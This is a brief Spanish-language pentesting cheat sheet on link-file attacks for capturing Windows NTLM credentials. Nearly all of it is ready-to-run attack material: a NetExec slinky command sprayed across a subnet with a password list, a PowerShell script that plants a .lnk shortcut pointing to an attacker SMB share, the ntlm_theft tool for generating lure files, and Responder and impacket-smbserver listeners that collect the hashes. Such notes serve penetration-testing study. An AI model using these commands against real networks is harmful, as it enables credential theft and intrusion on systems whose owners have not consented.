Link File Attacks¶
- Link File Attacks
-
Con NetExec
nxc smb 172.16.139.0/24 -u 'pthorpe' -p creds.txt -M slinky -o SERVER=172.16.139.10 NAME=urgent -
Manual:
- Código:
$objShell = New-Object -ComObject WScript.shell $lnk = $objShell.CreateShortcut("C:\test.lnk") $lnk.TargetPath = "\\192.168.138.149\@test.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Test" $lnk.HotKey = "Ctrl+Alt+T" $lnk.Save()smbserver.py -smb2support "icon" .
Con NTLM Theft¶
git clone https://github.com/Greenwolf/ntlm_theftcd ntlm_theftpython3 ntlm_theft.py --generate all --server 10.10.14.48 --filename iconimpacket-smbclient USER:'PASSWORD'@fIP- shares
- use share con acceso a escritura
sudo responder -I tun0oimpacket-smbserver -smb2support shareName someDir